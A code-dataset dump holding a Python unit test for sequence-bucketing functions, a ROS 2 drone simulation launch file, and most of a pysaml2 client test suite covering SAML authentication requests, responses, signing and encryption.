max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
---|---|---|---|---|---|---|---|---|---|---|
tfkstbd/tests/test_check.py | shkarupa-alex/tfstbd | 0 | 6632451 | <filename>tfkstbd/tests/test_check.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from collections import Counter
from ..check import mean_waste, estimate_buckets, estimate_batches
class TestMeaningWaste(unittest.TestCase):
def testNormal(self):
source = Counter({1: 5, 2: 2, 3: 1})
result = mean_waste(source)
self.assertEqual(0.5, result)
class TestEstimateBuckets(unittest.TestCase):
def testNormal(self):
source = Counter({
255: 16, 256: 15, 257: 20, 258: 16, 259: 17, 260: 15, 261: 15, 262: 12, 263: 13, 264: 13, 265: 11, 266: 9,
267: 8, 268: 9, 269: 7, 270: 9, 271: 7, 272: 6, 273: 5, 274: 6, 275: 5, 276: 4, 277: 4, 278: 4, 279: 4,
280: 4, 281: 5, 282: 3, 283: 3, 284: 3, 285: 3, 286: 2, 287: 3, 288: 2, 289: 2, 290: 3, 291: 2, 292: 1,
293: 2, 294: 1, 295: 2, 296: 1, 297: 1, 298: 1, 300: 1, 301: 1, 303: 1, 304: 1, 305: 1, 311: 1
})
result = estimate_buckets(source)
self.assertListEqual([262, 268, 274, 281, 287, 294, 301], result)
class TestEstimateBatches(unittest.TestCase):
def testNormal(self):
source_lens = Counter({
255: 16, 256: 15, 257: 20, 258: 16, 259: 17, 260: 15, 261: 15, 262: 12, 263: 13, 264: 13, 265: 11, 266: 9,
267: 8, 268: 9, 269: 7, 270: 9, 271: 7, 272: 6, 273: 5, 274: 6, 275: 5, 276: 4, 277: 4, 278: 4, 279: 4,
280: 4, 281: 5, 282: 3, 283: 3, 284: 3, 285: 3, 286: 2, 287: 3, 288: 2, 289: 2, 290: 3, 291: 2, 292: 1,
293: 2, 294: 1, 295: 2, 296: 1, 297: 1, 298: 1, 300: 1, 301: 1, 303: 1, 304: 1, 305: 1, 311: 1
})
source_bucks = [262, 268, 274, 281, 287, 294, 301]
result = estimate_batches(source_lens, source_bucks, 1024)
self.assertListEqual([1.177, 1.15, 1.124, 1.096, 1.074, 1.048, 1.024, 1.0], result)
| <filename>tfkstbd/tests/test_check.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from collections import Counter
from ..check import mean_waste, estimate_buckets, estimate_batches
class TestMeaningWaste(unittest.TestCase):
def testNormal(self):
source = Counter({1: 5, 2: 2, 3: 1})
result = mean_waste(source)
self.assertEqual(0.5, result)
class TestEstimateBuckets(unittest.TestCase):
def testNormal(self):
source = Counter({
255: 16, 256: 15, 257: 20, 258: 16, 259: 17, 260: 15, 261: 15, 262: 12, 263: 13, 264: 13, 265: 11, 266: 9,
267: 8, 268: 9, 269: 7, 270: 9, 271: 7, 272: 6, 273: 5, 274: 6, 275: 5, 276: 4, 277: 4, 278: 4, 279: 4,
280: 4, 281: 5, 282: 3, 283: 3, 284: 3, 285: 3, 286: 2, 287: 3, 288: 2, 289: 2, 290: 3, 291: 2, 292: 1,
293: 2, 294: 1, 295: 2, 296: 1, 297: 1, 298: 1, 300: 1, 301: 1, 303: 1, 304: 1, 305: 1, 311: 1
})
result = estimate_buckets(source)
self.assertListEqual([262, 268, 274, 281, 287, 294, 301], result)
class TestEstimateBatches(unittest.TestCase):
def testNormal(self):
source_lens = Counter({
255: 16, 256: 15, 257: 20, 258: 16, 259: 17, 260: 15, 261: 15, 262: 12, 263: 13, 264: 13, 265: 11, 266: 9,
267: 8, 268: 9, 269: 7, 270: 9, 271: 7, 272: 6, 273: 5, 274: 6, 275: 5, 276: 4, 277: 4, 278: 4, 279: 4,
280: 4, 281: 5, 282: 3, 283: 3, 284: 3, 285: 3, 286: 2, 287: 3, 288: 2, 289: 2, 290: 3, 291: 2, 292: 1,
293: 2, 294: 1, 295: 2, 296: 1, 297: 1, 298: 1, 300: 1, 301: 1, 303: 1, 304: 1, 305: 1, 311: 1
})
source_bucks = [262, 268, 274, 281, 287, 294, 301]
result = estimate_batches(source_lens, source_bucks, 1024)
self.assertListEqual([1.177, 1.15, 1.124, 1.096, 1.074, 1.048, 1.024, 1.0], result)
| en | 0.769321 | # -*- coding: utf-8 -*- | 2.428773 | 2 |
launch/drone_sim.launch.py | slaghuis/drone_mavsdk | 2 | 6632452 | <filename>launch/drone_sim.launch.py
from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
ld = LaunchDescription()
map_odom_tf = Node(
package='tf2_ros',
executable='static_transform_publisher',
arguments=['0','0','0','0','0','0','1','map','odom']
)
map_odom_ned_tf = Node(
package='tf2_ros',
executable='static_transform_publisher',
arguments=['0','0','0','1.57', '0', '3.14','map','odom_ned']
)
drone_node = Node(
package="drone",
executable="drone_node",
name="drone_node",
output="screen",
emulate_tty=True,
parameters=[
{"connection_url": "udp://:14540"},
{"height_topic": "sonar/range"},
{"height_sensor_z_offset": 0.153}
]
)
odom_tf2_broadcaster = Node(
package="drone",
executable="odom_tf2_broadcaster",
output="screen",
emulate_tty=True
)
ld.add_action(map_odom_tf)
ld.add_action(map_odom_ned_tf)
ld.add_action(drone_node)
ld.add_action(odom_tf2_broadcaster)
return ld
| <filename>launch/drone_sim.launch.py
from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
ld = LaunchDescription()
map_odom_tf = Node(
package='tf2_ros',
executable='static_transform_publisher',
arguments=['0','0','0','0','0','0','1','map','odom']
)
map_odom_ned_tf = Node(
package='tf2_ros',
executable='static_transform_publisher',
arguments=['0','0','0','1.57', '0', '3.14','map','odom_ned']
)
drone_node = Node(
package="drone",
executable="drone_node",
name="drone_node",
output="screen",
emulate_tty=True,
parameters=[
{"connection_url": "udp://:14540"},
{"height_topic": "sonar/range"},
{"height_sensor_z_offset": 0.153}
]
)
odom_tf2_broadcaster = Node(
package="drone",
executable="odom_tf2_broadcaster",
output="screen",
emulate_tty=True
)
ld.add_action(map_odom_tf)
ld.add_action(map_odom_ned_tf)
ld.add_action(drone_node)
ld.add_action(odom_tf2_broadcaster)
return ld
| none | 1 | 2.411631 | 2 |
|
tests/test_51_client.py | cmurphy/pysaml2 | 0 | 6632453 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import uuid
import six
from future.backports.urllib.parse import parse_qs
from future.backports.urllib.parse import urlencode
from future.backports.urllib.parse import urlparse
from pytest import raises
from saml2.argtree import add_path
from saml2.cert import OpenSSLWrapper
from saml2.xmldsig import SIG_RSA_SHA256
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from saml2 import config
from saml2 import class_name
from saml2 import extension_elements_to_elements
from saml2 import saml
from saml2 import samlp
from saml2 import sigver
from saml2 import s_utils
from saml2.assertion import Assertion
from saml2.extension.requested_attributes import RequestedAttributes
from saml2.extension.requested_attributes import RequestedAttribute
from saml2.authn_context import INTERNETPROTOCOLPASSWORD
from saml2.client import Saml2Client
from saml2.pack import parse_soap_enveloped_saml
from saml2.response import LogoutResponse
from saml2.saml import NAMEID_FORMAT_PERSISTENT, EncryptedAssertion, Advice
from saml2.saml import NAMEID_FORMAT_TRANSIENT
from saml2.saml import NameID
from saml2.samlp import SessionIndex
from saml2.server import Server
from saml2.sigver import pre_encryption_part, pre_encrypt_assertion
from saml2.sigver import rm_xmltag
from saml2.sigver import verify_redirect_signature
from saml2.s_utils import do_attribute_statement
from saml2.s_utils import factory
from saml2.time_util import in_a_while, a_while_ago
from defusedxml.common import EntitiesForbidden
from fakeIDP import FakeIDP
from fakeIDP import unpack_form
from pathutils import full_path
AUTHN = {
"class_ref": INTERNETPROTOCOLPASSWORD,
"authn_auth": "http://www.example.com/login"
}
encode_fn = getattr(base64, 'encodebytes', base64.encodestring)
def generate_cert():
sn = uuid.uuid4().urn
cert_info = {
"cn": "localhost",
"country_code": "se",
"state": "ac",
"city": "Umea",
"organization": "ITS",
"organization_unit": "DIRG"
}
osw = OpenSSLWrapper()
ca_cert_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.crt"))
ca_key_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.key"))
req_cert_str, req_key_str = osw.create_certificate(cert_info, request=True,
sn=sn, key_length=2048)
cert_str = osw.create_cert_signed_certificate(ca_cert_str, ca_key_str,
req_cert_str)
return cert_str, req_key_str
def add_subelement(xmldoc, node_name, subelem):
s = xmldoc.find(node_name)
if s > 0:
x = xmldoc.rindex("<", 0, s)
tag = xmldoc[x + 1:s - 1]
c = s + len(node_name)
spaces = ""
while xmldoc[c] == " ":
spaces += " "
c += 1
# Sometimes we get an xml header, sometimes we don't.
subelem_str = str(subelem)
if subelem_str[0:5].lower() == '<?xml':
subelem_str = subelem_str.split("\n", 1)[1]
xmldoc = xmldoc.replace(
"<%s:%s%s/>" % (tag, node_name, spaces),
"<%s:%s%s>%s</%s:%s>" % (tag, node_name, spaces, subelem_str, tag,
node_name))
return xmldoc
def for_me(condition, me):
for restriction in condition.audience_restriction:
audience = restriction.audience
if audience.text.strip() == me:
return True
def ava(attribute_statement):
result = {}
for attribute in attribute_statement.attribute:
# Check name_format ??
name = attribute.name.strip()
result[name] = []
for value in attribute.attribute_value:
result[name].append(value.text.strip())
return result
def _leq(l1, l2):
return set(l1) == set(l2)
REQ1 = {"1.2.14": """<?xml version='1.0' encoding='UTF-8'?>
<ns0:AttributeQuery Destination="https://idp.example.com/idp/" ID="id1"
IssueInstant="%s" Version="2.0" xmlns:ns0="urn:oasis:names:tc:SAML:2
.0:protocol"><ns1:Issuer Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:entity" xmlns:ns1="urn:oasis:names:tc:SAML:2
.0:assertion">urn:mace:example.com:saml:roland:sp</ns1:Issuer><ns1:Subject
xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion"><ns1:NameID
Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID
></ns1:Subject></ns0:AttributeQuery>""",
"1.2.16": """<?xml version='1.0' encoding='UTF-8'?>
<ns0:AttributeQuery xmlns:ns0="urn:oasis:names:tc:SAML:2.0:protocol"
xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion" Destination="https://idp
.example.com/idp/" ID="id1" IssueInstant="%s" Version="2.0"><ns1:Issuer
Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">urn:mace:example
.com:saml:roland:sp</ns1:Issuer><ns1:Subject><ns1:NameID
Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID
></ns1:Subject></ns0:AttributeQuery>"""}
nid = NameID(name_qualifier="foo", format=NAMEID_FORMAT_TRANSIENT,
text="123456")
def list_values2simpletons(_dict):
return dict([(k, v[0]) for k, v in _dict.items()])
class TestClient:
def setup_class(self):
self.server = Server("idp_conf")
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = Saml2Client(conf)
def teardown_class(self):
self.server.close()
def test_create_attribute_query1(self):
req_id, req = self.client.create_attribute_query(
"https://idp.example.com/idp/",
"E8042FB4-4D5B-48C3-8E14-8EDD852790DD",
format=saml.NAMEID_FORMAT_PERSISTENT,
message_id="id1")
reqstr = "%s" % req.to_string().decode()
assert req.destination == "https://idp.example.com/idp/"
assert req.id == "id1"
assert req.version == "2.0"
subject = req.subject
name_id = subject.name_id
assert name_id.format == saml.NAMEID_FORMAT_PERSISTENT
assert name_id.text == "E8042FB4-4D5B-48C3-8E14-8EDD852790DD"
issuer = req.issuer
assert issuer.text == "urn:mace:example.com:saml:roland:sp"
attrq = samlp.attribute_query_from_string(reqstr)
assert _leq(attrq.keyswv(), ['destination', 'subject', 'issue_instant',
'version', 'id', 'issuer'])
assert attrq.destination == req.destination
assert attrq.id == req.id
assert attrq.version == req.version
assert attrq.issuer.text == issuer.text
assert attrq.issue_instant == req.issue_instant
assert attrq.subject.name_id.format == name_id.format
assert attrq.subject.name_id.text == name_id.text
def test_create_attribute_query2(self):
req_id, req = self.client.create_attribute_query(
"https://idp.example.com/idp/",
"E8042FB4-4D5B-48C3-8E14-8EDD852790DD",
attribute={
("urn:oid:2.5.4.42",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri",
"givenName"): None,
("urn:oid:2.5.4.4",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri",
"surname"): None,
("urn:oid:1.2.840.113549.1.9.1",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"): None,
},
format=saml.NAMEID_FORMAT_PERSISTENT,
message_id="id1")
assert req.destination == "https://idp.example.com/idp/"
assert req.id == "id1"
assert req.version == "2.0"
subject = req.subject
name_id = subject.name_id
assert name_id.format == saml.NAMEID_FORMAT_PERSISTENT
assert name_id.text == "E8042FB4-4D5B-48C3-8E14-8EDD852790DD"
assert len(req.attribute) == 3
# one is givenName
seen = []
for attribute in req.attribute:
if attribute.name == "urn:oid:2.5.4.42":
assert attribute.name_format == saml.NAME_FORMAT_URI
assert attribute.friendly_name == "givenName"
seen.append("givenName")
elif attribute.name == "urn:oid:2.5.4.4":
assert attribute.name_format == saml.NAME_FORMAT_URI
assert attribute.friendly_name == "surname"
seen.append("surname")
elif attribute.name == "urn:oid:1.2.840.113549.1.9.1":
assert attribute.name_format == saml.NAME_FORMAT_URI
if getattr(attribute, "friendly_name"):
assert False
seen.append("email")
assert _leq(seen, ["givenName", "surname", "email"])
def test_create_attribute_query_3(self):
req_id, req = self.client.create_attribute_query(
"https://aai-demo-idp.switch.ch/idp/shibboleth",
"_e7b68a04488f715cda642fbdd90099f5",
format=saml.NAMEID_FORMAT_TRANSIENT,
message_id="id1")
assert isinstance(req, samlp.AttributeQuery)
assert req.destination == "https://aai-demo-idp.switch" \
".ch/idp/shibboleth"
assert req.id == "id1"
assert req.version == "2.0"
assert req.issue_instant
assert req.issuer.text == "urn:mace:example.com:saml:roland:sp"
nameid = req.subject.name_id
assert nameid.format == saml.NAMEID_FORMAT_TRANSIENT
assert nameid.text == "_e7b68a04488f715cda642fbdd90099f5"
def test_create_auth_request_0(self):
ar_str = "%s" % self.client.create_authn_request(
"http://www.example.com/sso", message_id="id1")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.assertion_consumer_service_url == ("http://lingon.catalogix"
".se:8087/")
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "false"
assert nid_policy.format == saml.NAMEID_FORMAT_TRANSIENT
node_requested_attributes = None
for e in ar.extensions.extension_elements:
if e.tag == RequestedAttributes.c_tag:
node_requested_attributes = e
break
assert node_requested_attributes is not None
for c in node_requested_attributes.children:
assert c.tag == RequestedAttribute.c_tag
assert c.attributes['isRequired'] in ['true', 'false']
assert c.attributes['Name']
assert c.attributes['FriendlyName']
assert c.attributes['NameFormat']
def test_create_auth_request_unset_force_authn(self):
req_id, req = self.client.create_authn_request(
"http://www.example.com/sso", sign=False, message_id="id1")
assert bool(req.force_authn) == False
def test_create_auth_request_set_force_authn(self):
req_id, req = self.client.create_authn_request(
"http://www.example.com/sso", sign=False, message_id="id1",
force_authn="true")
assert bool(req.force_authn) == True
def test_create_auth_request_nameid_policy_allow_create(self):
conf = config.SPConfig()
conf.load_file("sp_conf_nameidpolicy")
client = Saml2Client(conf)
ar_str = "%s" % client.create_authn_request(
"http://www.example.com/sso", message_id="id1")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.assertion_consumer_service_url == ("http://lingon.catalogix"
".se:8087/")
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "true"
assert nid_policy.format == saml.NAMEID_FORMAT_PERSISTENT
def test_create_auth_request_vo(self):
assert list(self.client.config.vorg.keys()) == [
"urn:mace:example.com:it:tek"]
ar_str = "%s" % self.client.create_authn_request(
"http://www.example.com/sso",
"urn:mace:example.com:it:tek", # vo
nameid_format=NAMEID_FORMAT_PERSISTENT,
message_id="666")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.id == "666"
assert ar.assertion_consumer_service_url == "http://lingon.catalogix" \
".se:8087/"
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "false"
assert nid_policy.format == saml.NAMEID_FORMAT_PERSISTENT
assert nid_policy.sp_name_qualifier == "urn:mace:example.com:it:tek"
def test_sign_auth_request_0(self):
req_id, areq = self.client.create_authn_request(
"http://www.example.com/sso", sign=True, message_id="id1")
ar_str = "%s" % areq
ar = samlp.authn_request_from_string(ar_str)
assert ar
assert ar.signature
assert ar.signature.signature_value
signed_info = ar.signature.signed_info
assert len(signed_info.reference) == 1
assert signed_info.reference[0].uri == "#id1"
assert signed_info.reference[0].digest_value
try:
assert self.client.sec.correctly_signed_authn_request(
ar_str, self.client.config.xmlsec_binary,
self.client.config.metadata)
except Exception: # missing certificate
self.client.sec.verify_signature(ar_str, node_name=class_name(ar))
def test_create_logout_request(self):
req_id, req = self.client.create_logout_request(
"http://localhost:8088/slo", "urn:mace:example.com:saml:roland:idp",
name_id=nid, reason="Tired", expire=in_a_while(minutes=15),
session_indexes=["_foo"])
assert req.destination == "http://localhost:8088/slo"
assert req.reason == "Tired"
assert req.version == "2.0"
assert req.name_id == nid
assert req.issuer.text == "urn:mace:example.com:saml:roland:sp"
assert req.session_index == [SessionIndex("_foo")]
def test_response_1(self):
IDP = "urn:mace:example.com:saml:roland:idp"
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["<EMAIL>"], "title": ["The man"]}
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id_policy=nameid_policy,
sign_response=True,
userid="<EMAIL>",
authn=AUTHN)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
assert authn_response is not None
assert authn_response.issuer() == IDP
assert authn_response.response.assertion[0].issuer.text == IDP
session_info = authn_response.session_info()
assert session_info["ava"] == {'mail': ['<EMAIL>'],
'givenName': ['Derek'],
'sn': ['Jeter'],
'title': ["The man"]}
assert session_info["issuer"] == IDP
assert session_info["came_from"] == "http://foo.example.com/service"
response = samlp.response_from_string(authn_response.xmlstr)
assert response.destination == "http://lingon.catalogix.se:8087/"
assert "session_index" in session_info
# One person in the cache
assert len(self.client.users.subjects()) == 1
subject_id = self.client.users.subjects()[0]
# The information I have about the subject comes from one source
assert self.client.users.issuers_of_info(subject_id) == [IDP]
# --- authenticate another person
ava = {"givenName": ["Alfonson"], "sn": ["Soriano"],
"mail": ["<EMAIL>"], "title": ["outfielder"]}
resp_str = "%s" % self.server.create_authn_response(
identity=ava,
in_response_to="id2",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
sign_response=True,
name_id_policy=nameid_policy,
userid="<EMAIL>",
authn=AUTHN)
resp_str = encode_fn(resp_str.encode())
self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id2": "http://foo.example.com/service"})
# Two persons in the cache
assert len(self.client.users.subjects()) == 2
issuers = [self.client.users.issuers_of_info(s) for s in
self.client.users.subjects()]
# The information I have about the subjects comes from the same source
assert issuers == [[IDP], [IDP]]
def test_response_2(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_3(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_4(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_5(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_assertion=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_6(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_assertion_str, cert_key_assertion_str = generate_cert()
cert_assertion = \
{
"cert": cert_assertion_str,
"key": cert_key_assertion_str
}
cert_advice_str, cert_key_advice_str = generate_cert()
cert_advice = \
{
"cert": cert_advice_str,
"key": cert_key_advice_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_assertion=cert_assertion_str,
encrypt_cert_advice=cert_advice_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"},
{"id1": [cert_assertion, cert_advice]})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_7(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_8(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypt_cert_assertion=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def setup_verify_authn_response(self):
idp = "urn:mace:example.com:saml:roland:idp"
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["<EMAIL>"], "title": ["The man"]}
ava_verify = {'mail': ['<EMAIL>'], 'givenName': ['Derek'],
'sn': ['Jeter'], 'title': ["The man"]}
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
return idp, ava, ava_verify, nameid_policy
def verify_authn_response(self, idp, authn_response, _client, ava_verify):
assert authn_response is not None
assert authn_response.issuer() == idp
assert authn_response.assertion.issuer.text == idp
session_info = authn_response.session_info()
assert session_info["ava"] == ava_verify
assert session_info["issuer"] == idp
assert session_info["came_from"] == "http://foo.example.com/service"
response = samlp.response_from_string(authn_response.xmlstr)
assert response.destination == "http://lingon.catalogix.se:8087/"
# One person in the cache
assert len(_client.users.subjects()) == 1
subject_id = _client.users.subjects()[0]
# The information I have about the subject comes from one source
assert _client.users.issuers_of_info(subject_id) == [idp]
def test_init_values(self):
entityid = self.client.config.entityid
assert entityid == "urn:mace:example.com:saml:roland:sp"
location = self.client._sso_location()
assert location == 'http://localhost:8088/sso'
my_name = self.client._my_name()
assert my_name == "urn:mace:example.com:saml:roland:sp"
def test_sign_then_encrypt_assertion(self):
# Begin with the IdPs side
_sec = self.server.sec
assertion = s_utils.assertion_factory(
subject=factory(saml.Subject, text="_aaa",
name_id=factory(
saml.NameID,
format=saml.NAMEID_FORMAT_TRANSIENT)),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
)
assertion.signature = sigver.pre_signature_part(
assertion.id, _sec.my_cert, 1)
sigass = _sec.sign_statement(assertion, class_name(assertion),
key_file=full_path("test.key"),
node_id=assertion.id)
# Create an Assertion instance from the signed assertion
_ass = saml.assertion_from_string(sigass)
response = sigver.response_factory(
in_response_to="_012345",
destination="https:#www.example.com",
status=s_utils.success_status_factory(),
issuer=self.server._issuer(),
assertion=_ass
)
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part())
seresp = samlp.response_from_string(enctext)
# Now over to the client side
_csec = self.client.sec
if seresp.encrypted_assertion:
decr_text = _csec.decrypt(enctext)
seresp = samlp.response_from_string(decr_text)
resp_ass = []
sign_cert_file = full_path("test.pem")
for enc_ass in seresp.encrypted_assertion:
assers = extension_elements_to_elements(
enc_ass.extension_elements, [saml, samlp])
for ass in assers:
if ass.signature:
if not _csec.verify_signature("%s" % ass,
sign_cert_file,
node_name=class_name(
ass)):
continue
resp_ass.append(ass)
seresp.assertion = resp_ass
seresp.encrypted_assertion = None
